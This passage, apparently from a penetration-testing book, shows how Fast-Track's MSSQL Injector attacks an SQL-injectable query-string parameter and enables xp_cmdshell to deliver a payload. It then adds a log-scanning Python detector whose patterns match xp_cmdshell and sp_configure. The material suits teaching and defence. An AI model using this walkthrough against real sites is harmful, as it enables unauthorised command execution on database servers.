Fast-Track
attacks by focusing on query string and POST parameters within web applications. The following attack relies on the attacker knowing that SQL injection is present on the target website, and also knowing which parameter is vulnerable. This attack will work only on MS SQL–based systems.
SQL Injector—Query String Attack
Begin the setup for the attack by selecting Microsoft SQL Tools from the main menu and then MSSQL Injector, as shown below.
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 1
The simplest form of SQL injection is within the query string, typically sent in the URL field from the browser to the server. This URL string can often contain parameters that inform a dynamic site what information is being requested. Fast-Track distinguishes which field to attack by inserting an 'INJECTHERE into the vulnerable query string parameter, like this:
http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2011
When Fast-Track starts to exploit this vulnerability, it will look for the id string in all fields to determine which field to attack. Let’s look at this in action by selecting the first option, Query String Parameter Attack.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice: 1
. . . SNIP . . .
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectable parameter
Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter here: http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2011
Sending initial request to enable xp_cmdshell if disabled...
Sending first portion of payload (1/4)...
Sending second portion of payload (2/4)...
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
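Seen from the defender's side, the requests in this output all pass through one query-string parameter and reference xp_cmdshell, which on MS SQL is enabled through sp_configure. The following Python script is an added example, not code from the book or from Fast-Track: it flags such parameters in web server logs. The log tuples, function names and matching rule are assumptions made for illustration, and the sample entries are constructed with their payload bodies elided.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed (client IP, request URI) pairs; payload bodies are elided.
SAMPLE_LOG = [
    ("203.0.113.7", "/index.asp?id=42&date=2011"),
    ("203.0.113.7", "/index.asp?id=42%27%3BEXEC+sp_configure+ELIDED--&date=2011"),
    ("203.0.113.7", "/index.asp?id=42%2527%253BeXeC+master..xp_cmdshell+ELIDED--&date=2011"),
    ("198.51.100.9", "/search.asp?q=O%27Brien"),
    ("198.51.100.9", "/help.asp?topic=xp_cmdshell"),
]

# MSSQL procedures tied to command execution, plus the characters that end a
# string literal or start a stacked statement (assumed matching rule).
KEYWORDS = re.compile(r"\b(?:xp_cmdshell|sp_configure)\b")
BREAKOUT = re.compile(r"[';]")


def normalize(value):
    """Undo nested URL encoding (bounded) and fold case before matching."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def suspicious_params(uri):
    """Return names of query-string parameters that both break out of a
    literal and reference xp_cmdshell or sp_configure."""
    hits = []
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        value = normalize(raw)
        if KEYWORDS.search(value) and BREAKOUT.search(value):
            hits.append(name)
    return hits


def scan(log):
    """Group flagged (path, parameter) pairs by client address."""
    report = defaultdict(list)
    for client, uri in log:
        for name in suspicious_params(uri):
            report[client].append((urlsplit(uri).path, name))
    return dict(report)


if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

Requiring both a breakout character and a procedure name keeps a surname such as O'Brien or a help-page lookup for xp_cmdshell from being flagged, while several hits from one client in a row match the multi-part delivery shown in the output above.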